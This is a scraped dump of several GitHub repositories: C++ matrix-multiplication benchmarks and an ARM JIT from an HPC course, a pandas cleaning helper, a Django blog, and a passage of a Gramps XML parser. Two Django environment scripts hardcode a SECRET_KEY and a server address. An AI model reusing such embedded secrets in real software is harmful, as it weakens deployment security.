3, 1, 3);\n REQUIRE(compare_matrices(c_4, c_4_res, 3, 3, 3, 3));\n \n // CASE 5\n float c_5[1] = {0};\n float a_5[3] = {0.9653f, 0.2732f, 0.4596f};\n float b_5[3] = {0.5098f, 0.8970f, 0.7755f};\n \n float c_5_res[1] = {1.0937f};\n \n gemm_ref(a_5, b_5, c_5, 1, 1, 3, 1, 3, 1);\n REQUIRE(compare_matrices(c_5, c_5_res, 1, 1, 1, 1, 1.0e-3));\n}\n" }, { "alpha_fraction": 0.6164383292198181, "alphanum_fraction": 0.6688504815101624, "avg_line_length": 36.28888702392578, "blob_id": "234eff04dd565c5711846ef09e84c12e7a723d69", "content_id": "923f695081b0ec8634b8ec5be43293cbe104e5ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1679, "license_type": "no_license", "max_line_length": 149, "num_lines": 45, "path": "/exercise_3/solution.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "# Task 1: key metrics\n\ninstruction | used pipelines | latency | throughput\n-----------------------------------------------------\nfmul | FP/ASIMD 0 and 1 | 3 | 2\n\nfmla | FP/ASIMD 0 and 1 | 4 | 2\n\n\n# Task 2: theoretical peak performance\n\noperations / second = frequency * operations / cycle\n\nFrequency: f = 2.5 GHz = 2.5 * 10^9 Hz\n\nOur pipeline is bound by the latency. In this case the throughput per pipeline is 1/3 (or 1/4 in case of fmla).\n\noperations / cycle = 1/latency * p where p is 2 for double precision and 4 for single precision\n\ntpp_fmul_sp = 2.5 * 10^9 * 1/3 * 4 = 3.333... GFLOPS\ntpp_fmla_sp = 2.5 * 10^9 * 1/4 * 4 = 2.5 GFLOPS\n\n# Task 3: micro-benchmark fmla\n\nMeasuring with likwid-bench -t latency_src_asimd_fmla_sp -w S0:1GB:1 \ngave as result MFlops/s: 4996.79\n\nThis is twice the value compared to the theoretical peak performance. However our Neoverse N1 has two pipelines and so the tpp value must be doubled.\n\n# Task 4: micro-benchmark fmul\n\nMeasuring with likwid-bench -t latency_src_asimd_fmul_sp -w S0:1GB:1\ngave as result: MFlops/s: 6662.08\nWhich coincides with the theoretical peak performance of one pipeline and two pipelines used by the Neoverse N1.\n\n# Task 5: data dependency destination register\n\nMeasuring with likwid-bench -t latency_dst_asimd_fmla_sp -w S0:1GB:1 \nMFlops/s: 9993.08\n\nMeasuring with likwid-bench -t latency_dst_asimd_fmul_sp -w S0:1GB:1\nMFlops/s: 39968.92\n\nThe performance is much higher in both cases.\nSince the results are never used again (and especially not by the next instruction) and therefor the pipeline can be kept full. \n" }, { "alpha_fraction": 0.6584158539772034, "alphanum_fraction": 0.6650164723396301, "avg_line_length": 20.678571701049805, "blob_id": "310bea24447828bcb27f65425500515881b9e959", "content_id": "f0f55753f30d41956bd8a23c0a4e0d51a7c0c5ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 606, "license_type": "no_license", "max_line_length": 72, "num_lines": 28, "path": "/exercise_9/mini_jit_base/src/generators/MyExample.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef MINI_JIT_GENERATORS_MYEXAMPLE_H\n#define MINI_JIT_GENERATORS_MYEXAMPLE_H\n\n#include \"../backend/Kernel.h\"\n#include \"../instructions/Base.h\"\n\nnamespace mini_jit {\n namespace generators {\n class MyExample;\n }\n}\n\nclass mini_jit::generators::MyExample {\n private:\n //! kernel backend\n backend::Kernel m_kernel;\n \n public:\n /**\n * Generates a kernel which calculates the factorial through a loop.\n *\n * @param i_fac number for which the factorial should be computed\n * @return function pointer to kernel.\n **/\n uint32_t ( *generate(uint32_t i_fac) )();\n};\n\n#endif" }, { "alpha_fraction": 0.4887005686759949, "alphanum_fraction": 0.4963276982307434, "avg_line_length": 34.75757598876953, "blob_id": "a63f19e9b17349e82c0458baf4eaae4e3628c354", "content_id": "1a530de9f557f13b9c4434da65962af622a9cf05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3540, "license_type": "no_license", "max_line_length": 129, "num_lines": 99, "path": "/exercise_4/src/driver_4_4.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"util.hpp\"\n#include \"gemm_ref.hpp\"\n\n#include <vector>\n#include <iostream>\n#include <chrono>\n\n#include <libxsmm.h>\n\nint main()\n{\n std::vector<unsigned int> lambdas = {4, 8, 12, 16, 24, 32, 48, 64};\n const unsigned int iterations = 100000;\n \n \n \n \n for (auto lambda : lambdas) \n {\n int m = lambda;\n int n = lambda;\n int k = lambda;\n int lda = lambda;\n int ldb = lambda;\n int ldc = lambda;\n std::cout << \"#######################################\" << std::endl; \n std::cout << \" M = N = K = ld A = ld B = ld C = \" << lambda << std::endl;\n std::cout << \" Initializing random matrices...\" << std::endl;\n float* A = random_matrix(m, k, lda);\n float* B = random_matrix(k, n, ldb);\n float* C = random_matrix(m, n, ldc);\n \n int flop_gemm = lambda * lambda * (2 * lambda);\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring (reference kernel).\" << std::endl;\n \n float* A_test = random_matrix(m, k, lda);\n float* B_test = random_matrix(k, n, ldb);\n float* C_ref = zero_matrix(m, n, ldc);\n float* C_xsmm = zero_matrix(m, n, ldc);\n \n \n gemm_ref(A_test, B_test, C_ref, m, n, k, lda, ldb, ldc);\n \n auto start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_ref(A, B, C, m, n, k, lda, ldb, ldc);\n }\n auto end_time = std::chrono::high_resolution_clock::now();\n \n std::chrono::duration<double> needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * iterations / needed_time.count() << std::endl;\n \n \n std::cout << std::endl << \"Performance of libxsmm kernel\" << std::endl;\n \n float alpha = 1.0, beta = 1.0;\n int flags = LIBXSMM_GEMM_FLAG_NONE;\n libxsmm_smmfunction kernel = libxsmm_smmdispatch(m, n, k, &lda, &ldb, &ldc, &alpha, &beta, &flags, nullptr /*prefetch*/);\n \n kernel(A_test, B_test, C_xsmm);\n \n std::cout << \"Comparing results... \" << std::endl;\n if (compare_matrices(C_ref, C_xsmm, m, n, ldc, ldc))\n {\n std::cout << \"Test passed!\" << std::endl;\n }\n else\n {\n std::cerr << \"Test failed!\" << std::endl;\n }\n \n std::cout << \"Starting time measuring (libxsmm kernel).\" << std::endl;\n start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n kernel(A, B, C);\n }\n end_time = std::chrono::high_resolution_clock::now();\n \n needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * iterations / needed_time.count() << std::endl;\n \n\tstd::cout << \"################################\" << std::endl << std::endl;\n delete[] A;\n delete[] B;\n delete[] C;\n }\n \n \n}\n" }, { "alpha_fraction": 0.35618066787719727, "alphanum_fraction": 0.4310618042945862, "avg_line_length": 29.792682647705078, "blob_id": "f29ce7fac8d263ba16e3468ec47d86bb7d13ba63", "content_id": "ad09b5330ecd1428eb5b4bd0f96dc39677d00a91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2524, "license_type": "no_license", "max_line_length": 69, "num_lines": 82, "path": "/exercise_9/mini_jit_base/src/instructions/Base.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"Base.h\"\n\nuint32_t mini_jit::instructions::Base::bRet() {\n return 0xd65f03c0;\n}\n\nuint32_t mini_jit::instructions::Base::bCbnz( uint8_t i_regGp,\n int32_t i_imm19,\n uint8_t i_size ) {\n uint32_t l_ins = 0x35000000;\n l_ins |= 0x1f & i_regGp;\n l_ins |= (0x7FFFF & i_imm19) << 5;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Base::dpMovImm( uint8_t i_regGp,\n uint16_t i_imm16,\n uint8_t i_size ) {\n uint32_t l_ins = 0x52800000;\n l_ins |= 0x1f & i_regGp;\n l_ins |= i_imm16 << 5;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Base::dpMovReg( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint8_t i_size )\n{\n uint32_t l_ins = 0xAA0003E0;\n l_ins |= 0x1f & i_regGpDes;\n l_ins |= (0x1f & i_regGpSrc) << 16;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Base::dpAddImm( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint16_t i_imm12,\n uint8_t i_size ) {\n uint32_t l_ins = 0x11000000;\n\n l_ins |= 0x1f & i_regGpDes;\n l_ins |= (0x1f & i_regGpSrc) << 5;\n l_ins |= (0xfff & i_imm12) << 10;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Base::dpSubImm( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint16_t i_imm12,\n uint8_t i_size ) {\n uint32_t l_ins = 0x51000000;\n\n l_ins |= 0x1f & i_regGpDes;\n l_ins |= (0x1f & i_regGpSrc) << 5;\n l_ins |= (0xfff & i_imm12) << 10;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Base::dpMulReg( uint8_t i_regGpDes,\n uint8_t i_regGpSrc1,\n uint8_t i_regGpSrc2,\n uint8_t i_size )\n{\n uint32_t l_ins = 0x9B007C00;\n\n l_ins |= 0x1f & i_regGpDes;\n l_ins |= (0x1f & i_regGpSrc1) << 5;\n l_ins |= (0x1f & i_regGpSrc2) << 16;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}" }, { "alpha_fraction": 0.5160301923751831, "alphanum_fraction": 0.5570485591888428, "avg_line_length": 39.400001525878906, "blob_id": "f8013993789255f6b3b0a2e8f24ac12210c0905b", "content_id": "e8797bc8e549a4ae0e0ab36c32ae6cf7ecd7c3d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4242, "license_type": "no_license", "max_line_length": 114, "num_lines": 105, "path": "/exercise_4/src/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"util.hpp\"\n#include \"gemm_ref.hpp\"\n#include \"gemm_compiler_32_32_32_32_32_32.hpp\"\n\n#include <vector>\n#include <iostream>\n#include <chrono>\n\nint main()\n{\n std::vector<unsigned int> lambdas = {4, 8, 12, 16, 24, 32, 48, 64};\n const unsigned int iterations = 10000;\n \n for (auto lambda : lambdas) \n {\n std::cout << \" M = N = K = ld A = ld B = ld C = \" << lambda << std::endl;\n std::cout << \" Initializing random matrices...\" << std::endl;\n float* A = random_matrix(lambda, lambda, lambda);\n float* B = random_matrix(lambda, lambda, lambda);\n float* C = random_matrix(lambda, lambda, lambda);\n \n int flop_gemm = lambda * lambda * (2 * lambda - 1);\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring.\" << std::endl;\n \n auto start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_ref(A, B, C, lambda, lambda, lambda, lambda, lambda, lambda);\n }\n auto end_time = std::chrono::high_resolution_clock::now();\n //auto time = std::chrono::duration_cast<std::chrono::seconds>(end_time - start_time);\n //std::chrono::duration<double, std::seconds> needed_time = end_time - start_time;\n std::chrono::duration<double> needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained GFLOPS: \" << flop_gemm * iterations / needed_time.count() << std::endl;\n delete[] A;\n delete[] B;\n delete[] C;\n }\n \n std::cout << \"###########################\" << std::endl << std::endl;\n \n float* A = random_matrix(32, 32, 32);\n float* B = random_matrix(32, 32, 32);\n float* C_ref = zero_matrix(32, 32, 32);\n float* C_mnk = zero_matrix(32, 32, 32);\n float* C_nkm = zero_matrix(32, 32, 32);\n \n std::cout << \"Comparing results... \" << std::endl;\n gemm_ref(A, B, C_ref, 32, 32, 32, 32, 32, 32);\n gemm_compiler_32_32_32_32_32_32_mnk(A, B, C_mnk);\n gemm_compiler_32_32_32_32_32_32_nkm(A, B, C_nkm);\n \n if (compare_matrices(C_ref, C_mnk, 32, 32, 32, 32) && compare_matrices(C_ref, C_nkm, 32, 32, 32, 32))\n {\n std::cout << \"Test passed!\" << std::endl;\n }\n else\n {\n std::cerr << \"Test failed!\" << std::endl;\n }\n \n std::cout << \"Measuring performance... \" << std::endl;\n int flop_gemm = 32 * 32 * (2 * 32 - 1);\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"gemm_compiler_32_32_32_32_32_32_mnk:\" << std::endl;\n auto start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_compiler_32_32_32_32_32_32_mnk(A, B, C_mnk);\n }\n auto end_time = std::chrono::high_resolution_clock::now();\n std::chrono::duration<double> needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained GFLOPS: \" << flop_gemm * iterations / needed_time.count() << std::endl;\n \n \n std::cout << \"gemm_compiler_32_32_32_32_32_32_nkm:\" << std::endl;\n start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_compiler_32_32_32_32_32_32_nkm(A, B, C_mnk);\n }\n end_time = std::chrono::high_resolution_clock::now();\n needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained GFLOPS: \" << flop_gemm * iterations / needed_time.count() << std::endl;\n \n \n delete[] A;\n delete[] B;\n delete[] C_ref;\n delete[] C_mnk;\n delete[] C_nkm;\n\n}\n" }, { "alpha_fraction": 0.5035842061042786, "alphanum_fraction": 0.5268816947937012, "avg_line_length": 22.29166603088379, "blob_id": "80186c72cf9cc96e8cbf4e7a24d8576e3d87a652", "content_id": "7b731d12f11121d4465279d0427fe202f48b037e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 558, "license_type": "no_license", "max_line_length": 58, "num_lines": 24, "path": "/exercise_9/mini_jit_base/src/generators/Simple.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"Simple.h\"\n\nuint32_t ( *mini_jit::generators::Simple::generate() )() {\n uint32_t l_ins = 0;\n\n // mov w0, #0x3\n l_ins = instructions::Base::dpMovImm( 0,\n 3,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n // ret\n l_ins = instructions::Base::bRet();\n m_kernel.addInstruction( l_ins );\n\n\n // we might debug through file-io\n std::string l_file = \"simple.bin\";\n m_kernel.write( l_file.c_str() );\n\n m_kernel.setKernel();\n\n return (uint32_t (*)()) m_kernel.getKernel();\n}" }, { "alpha_fraction": 0.6046798229217529, "alphanum_fraction": 0.6625615954399109, "avg_line_length": 88.66666412353516, "blob_id": "328a39dd82fd8e54ba909e1df6eedf6f564fe640", "content_id": "4ef8a5c0953219da1e227a7f38b8b516f28e36e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 812, "license_type": "no_license", "max_line_length": 202, "num_lines": 9, "path": "/exercise_7/Makefile", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "BUILD_DIR = ./build\n\ngemm_asm_asmid: driver.cpp ../exercise_4/src/gemm_ref.cpp ../exercise_4/src/util.cpp gemm_asm_asimd_19_4_4.s gemm_asm_asimd_32_32_32.s\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 -c ../exercise_4/src/gemm_ref.cpp -o ${BUILD_DIR}/gemm_ref.o\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 -c ../exercise_4/src/util.cpp -o ${BUILD_DIR}/util.o\n\t\tgcc -g -pedantic -Wall -Wextra -Werror -c gemm_asm_asimd_19_4_4.s -o ${BUILD_DIR}/gemm_asm_asimd_19_4_4.o\n\t\tgcc -g -pedantic -Wall -Wextra -Werror -c gemm_asm_asimd_32_32_32.s -o ${BUILD_DIR}/gemm_asm_asimd_32_32_32.o\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 driver.cpp ${BUILD_DIR}/gemm_ref.o ${BUILD_DIR}/util.o ${BUILD_DIR}/gemm_asm_asimd_19_4_4.o ${BUILD_DIR}/gemm_asm_asimd_32_32_32.o -o ${BUILD_DIR}/driver \n$(shell mkdir -p build)\n \n" } ]
44
byambaa1982/usefulregex
https://github.com/byambaa1982/usefulregex
b7b34fba1b52dd5fb63e8a08c4d9139239b8ebe3
34c325e6f4e0257fbfb74d61a52263902e858271
9a2d04abd2f25aade7226493de7ece29251e4f10
refs/heads/master
2023-02-21T02:29:14.018542
2023-02-12T05:26:53
2023-02-12T05:26:53
236,561,661
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5377358198165894, "alphanum_fraction": 0.5448113083839417, "avg_line_length": 19.190475463867188, "blob_id": "9a36ebadd567c535c523a43c218b193a3ecb5f14", "content_id": "dd247022629d58e990d0e62b1e754a0f13b52b1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 848, "license_type": "no_license", "max_line_length": 79, "num_lines": 42, "path": "/main.py", "repo_name": "byambaa1982/usefulregex", "src_encoding": "UTF-8", "text": "import pandas as pd \nimport numpy as np \n\n\n\n\n#--------------no regex version---------------\n# ---------------turn any string into foat-------------\ndef anystring_to_float(string):\n newstring =\"\" \n my_float=\"\"\n count=0\n try:\n for a in string: \n if a=='.' or (a.isnumeric()) == True: \n count+= 1\n my_float+=a\n else: \n newstring+= a \n # print(count) \n # print(newstring) \n # print('data type of {} is now {}'.format(num, type(num)))\n return float(my_float)\n except:\n return np.nan\n\n\n# anystring_to_float(string)\n\n\ndef change_df(df):\n for i in indice_of_columns:\n print(df.columns[i])\n df[df.columns[i]]=df[df.columns[i]].map(lambda row:anystring_to_float(row))\n return df\n\n\n#--------You should change indice list here: ---------\n\n\nindice_of_columns=[5,7,8,9]\nchange_df(df)\n" }, { "alpha_fraction": 0.6338363885879517, "alphanum_fraction": 0.6525020003318787, "avg_line_length": 19.983333587646484, "blob_id": "c7cf5477be02a55acc29e6e3cc5d3eb5644fb849", "content_id": "d28f2ce44497f31212b051f05a964cdb8debd96f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2518, "license_type": "no_license", "max_line_length": 110, "num_lines": 120, "path": "/README.md", "repo_name": "byambaa1982/usefulregex", "src_encoding": "UTF-8", "text": "## Data cleaning without using regex\n\nAll code is here:\nhttps://github.com/byambaa1982/usefulregex/blob/master/main.py\n\nIf you want to fork the project on github and git clone your fork, e.g.:\n\n git clone https://github.com/<username>/usfulregex.git\n \nAs a data scientist, I wasted a lot of time cleaning data, especially for dirty data like the following one. \n\n### Raw data \n\n![Data](/images/data_pic.png)\n\n\nProblem is that we cannot use following codes because of symbols like '--' or '-' \n```python\n\tdf['DataFrame Column'] = pd.to_numeric(df['DataFrame Column'])\n\n\tor \n\n\tdf['DataFrame Column'] = df['DataFrame Column'].astype(int)\n```\nLet's take a look at one of following cells.\n\n```python\n\tprint(df['Temperature'][0])\n\tprint(df['Apparent temperature'][0])\n\tprint(df['Distance'][0])\n```\nResults:\n\t\n\t59.55 \n\t59.55\n\t1200M\n\n\nThe first two looks like floats,but it will give us 'str' not 'float'.\n```python\n\tprint(type(df['Temperature'][0]))\n\tprint(type(df['Apparent temperature'][0]))\n\tprint(type(df['Distance'][0]))\n```\nResults:\n\n\t<class 'str'>\n\t<class 'str'>\n\t<class 'str'>\n\n\nBefor going further, start simple\n\n string ='3ad.23'\n \nLet's clean this string. '3ad.23' is not digit. \n\n\n\tdef anystring_to_float(string):\n\t newstring =\"\" \n\t my_float=\"\"\n\t count=0\n\t try:\n\t for a in string: \n\t if a=='.' or (a.isnumeric()) == True: \n\t count+= 1\n\t my_float+=a\n\t else: \n\t newstring+= a \n\t # print(count) \n\t # print(newstring) \n\t # print('data type of {} is now {}'.format(num, type(num)))\n\t return float(my_float)\n\t except:\n\t return np.nan\n\n\tanystring_to_float(string)\n\nString might be like that \"--\". Then the function make it into numpy null value. \n\nNow we can use it for pandas Dataframe. \n\n\tdef change_df(df):\n\t for i in indice_of_columns:\n\t print(df.columns[i])\n\t df[df.columns[i]]=df[df.columns[i]].map(lambda row:anystring_to_float(row))\n\t return df\n\nHere indice_of_columns is the indice of columns we want to change. In our case, it is \n\n\tindice_of_columns=[5,7,8,9]\n\nFinally, we can run the function 'change_df' and get result. \nLet's check them:\n\n\tprint(type(df['Temperature'][0]))\n\tprint(type(df['Apparent temperature'][0]))\n\tprint(type(df['Distance'][0]))\n\nNew result: \n\n\t<class 'float'>\n\t<class 'float'>\n\t<class 'float'>\n\n\n### Cleaned data\n\n![Data](/images/data_pic2.png)\n\n\nThat simple!\n\n\nPlease connect me in linkedin: \n\thttps://www.linkedin.com/in/byamba-enkhbat-026722162/\n\t\n\t\nHire me here:\n\twww.fiverr.com/coderjs\n" } ]
2
timm67/djblog9vm
https://github.com/timm67/djblog9vm
5d6c974fa96ce3efb8dc0c40bfc0bd35e048b722
550b462504522d989d770ff02108cb7249fe3143
eeb5b9a7ad63b6c13bce0d88f17dd12f26c9008b
refs/heads/master
2020-05-30T06:48:12.631778
2019-06-10T19:58:35
2019-06-10T19:58:35
189,585,998
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6979166865348816, "alphanum_fraction": 0.765625, "avg_line_length": 31, "blob_id": "45a19d01486c06f8f7d866b6827476b4e2066996", "content_id": "100f4358c29da8c969c20241b7eb929fa915fa16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 192, "license_type": "no_license", "max_line_length": 68, "num_lines": 6, "path": "/envs_alt_server.sh", "repo_name": "timm67/djblog9vm", "src_encoding": "UTF-8", "text": "#!/bin/sh\nexport DEBUG='False'\nexport TEMPLATE_DEBUG='False'\nexport ALLOWED_HOSTS='168.62.28.36'\nexport STATIC_ROOT='/home/py230admin/djblog9vm/mysite/mysite/static'\nexport SECRET_KEY='na!#t6xZ8P64@b*&K?ndybs6nFK_=n78'\n" }, { "alpha_fraction": 0.550000011920929, "alphanum_fraction": 0.7300000190734863, "avg_line_length": 19, "blob_id": "fffaaa12260eeacc3de5a4d9822bb3c8e2d6a8d3", "content_id": "592e248a52eb0a295e9635d8a6465a674d3dccb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 100, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/requirements.txt", "repo_name": "timm67/djblog9vm", "src_encoding": "UTF-8", "text": "dj-database-url==0.5.0\ndjango>=2.2.2\ndjangorestframework==3.9.3\npsycopg2-binary==2.8.2\npytz==2019.1\n" }, { "alpha_fraction": 0.6814814805984497, "alphanum_fraction": 0.6888889074325562, "avg_line_length": 15.875, "blob_id": "3a474c8043f37200cf219866b97f0aa5ef241656", "content_id": "9448876e6fab1c0efd62658de04e9e06b1e5dd06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 135, "license_type": "no_license", "max_line_length": 80, "num_lines": 8, "path": "/README.md", "repo_name": "timm67/djblog9vm", "src_encoding": "UTF-8", "text": "# djblog9vm\n\n## Setup\n\nTo set the environment variables, source the envs_alt_server.sh file, like this:\n```\n. ./envs_alt_server.sh\n```\n" }, { "alpha_fraction": 0.7269503474235535, "alphanum_fraction": 0.7269503474235535, "avg_line_length": 36.599998474121094, "blob_id": "478c481f1fe383caf2aad3c7edcca9e2ede818cf", "content_id": "29e8f84baf3029d7fe31fc5e3f8bf9d7b3d4257d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 564, "license_type": "no_license", "max_line_length": 81, "num_lines": 15, "path": "/mysite/blogging/urls.py", "repo_name": "timm67/djblog9vm", "src_encoding": "UTF-8", "text": "from django.urls import include, path\nfrom blogging.views import list_view, detail_view, add_view\nfrom rest_framework import routers\nfrom .views import PostViewSet, CategoryViewSet\n\nrouter = routers.DefaultRouter()\nrouter.register(r'api_post', PostViewSet)\nrouter.register(r'api_category', CategoryViewSet)\n\nurlpatterns = [\n path('', list_view, name=\"blog_index\"),\n path('posts/<int:post_id>/', detail_view, name=\"blog_detail\"),\n path('add/', add_view, name=\"blog_add\"),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework'))\n]\n" }, { "alpha_fraction": 0.730088472366333, "alphanum_fraction": 0.7876105904579163, "avg_line_length": 36.66666793823242, "blob_id": "6be3862c7e43543d4c7a24715cde381acf028fe6", "content_id": "4c723be87ec90e0f8dac59b40499a1eb4e279a33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 226, "license_type": "no_license", "max_line_length": 69, "num_lines": 6, "path": "/envs.sh", "repo_name": "timm67/djblog9vm", "src_encoding": "UTF-8", "text": "#!/bin/sh\nexport DEBUG='False'\nexport TEMPLATE_DEBUG='False'\nexport ALLOWED_HOSTS='py230-ubtuntu-009009.westus.cloudapp.azure.com'\nexport STATIC_ROOT='/home/py230admin/djblog9vm/mysite/mysite/static'\nexport SECRET_KEY='na!#t6xZ8P64@b*&K?ndybs6nFK_=n78'\n" } ]
5
claws/gramps2gource
https://github.com/claws/gramps2gource
a747f0c9056257d65bf2532b619848edede210bb
5087d22cb8bcc3778a91ecfb279b946b23164aac
073c2942ac1d355fa1be38e21a90ca9891289570
refs/heads/master
2021-01-17T09:01:22.480583
2018-10-17T21:13:49
2018-10-17T21:13:49
15,521,314
6
6
MIT
2013-12-30T05:41:32
2018-10-14T22:19:16
2018-10-17T13:04:49
Python
[ { "alpha_fraction": 0.5034090280532837, "alphanum_fraction": 0.514549195766449, "avg_line_length": 32.422176361083984, "blob_id": "c803e38fb6f5b4d9325d951e8ea8a77ce4137fff", "content_id": "07bb7f771039b658271800ba58af84ed9547cd18", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32854, "license_type": "permissive", "max_line_length": 87, "num_lines": 983, "path": "/gramps.py", "repo_name": "claws/gramps2gource", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n'''\nThis module implements a simple and naive Gramps XML file (.gramps) parser.\n\nAuthor: Chris Laws\n'''\n\nfrom __future__ import unicode_literals\nfrom future.builtins import str\n\nimport datetime\nimport dateutil.parser\nimport gzip\nimport logging\ntry:\n from xml.etree import cElementTree as etree\nexcept ImportError:\n from xml.etree import ElementTree as etree\n\n\nlogger = logging.getLogger(__name__)\n\n\nindent = \" \"\n\n\ndef default_date_parser(datestring):\n ''' Convert a date string into a datetime object '''\n\n # some dates are missing the day so use a default such that\n # a valid datetime object can be created.\n if len(datestring.split(\"-\")) == 2:\n logger.debug(\n \"{0} missing item from date string, using day 01 for\"\n \" compatibility\".format(datestring))\n datestring = \"{0}-01\".format(datestring)\n\n # Dates are used in many different formats, use the\n # dateutil parser in an effort to successfully\n # parse a useful date.\n return dateutil.parser.parse(datestring)\n\n\nclass DateParser(object):\n\n def __init__(self):\n\n self.handlers = {}\n\n # register a default handler to use as a fallback.\n self.register('default', default_date_parser)\n\n def register(self, cal_format, handler):\n '''\n Register a handler function for a specific date_type. For example,\n if your dates are in `French Republican` format use can use this\n method to register a handler function that will convert one of\n these dates into a valid datetime.\n\n :param cal_format: a string identifying the calendar format type.\n For example, `French Republican`.\n\n :param handler: a callable that can convert a date string into a\n valid datetime object.\n '''\n logger.debug(\n 'Registering a date handler for format: %s', cal_format)\n if cal_format in self.handlers:\n raise Exception(\n 'Duplicate date handlers detected for: %s', cal_format)\n self.handlers[cal_format] = handler\n\n def parse(self, datestring, cal_format=None):\n ''' Parse a date string and return a datetime object.\n\n :param format: the format of the date string. For example, Islamic,\n French Republican, etc.\n '''\n cformat = cal_format or 'default'\n\n if cformat not in self.handlers:\n logger.warning(\n 'No date parser registered for %s, falling back to default',\n cformat)\n cformat = 'default'\n\n handler = self.handlers.get(cformat)\n return handler(datestring)\n\n\ndate_processor = DateParser()\n\n\ndef generate_timestring(dt):\n '''\n Required because datetime.strftime barfs on years prior to 1900\n '''\n format = \"%Y-%m-%d\"\n if dt.year > 1900:\n return dt.strftime(format)\n else:\n format = format.replace('%Y', str(dt.year))\n dt = datetime.datetime(1900, dt.month, dt.day, dt.hour,\n dt.minute, dt.second)\n\n return dt.strftime(format)\n\n\nclass Place(object):\n '''\n A Gramps place object.\n\n Example of a Gramps place structure:\n\n <places>\n <placeobj handle=\"_bcd2a83849845c12c13\" change=\"1297580946\" id=\"P0806\">\n <ptitle>Morwell, Victoria, Australia</ptitle>\n <coord long=\"146.3947107\" lat=\"-38.2345742\"/>\n </placeobj>\n '''\n\n def __init__(self, store):\n self.store = store\n self.handle = None\n self.id = None\n self.type = None\n self.title = None\n self.lat = None\n self.lon = None\n\n @property\n def coordinates(self):\n '''\n Return a tuple of 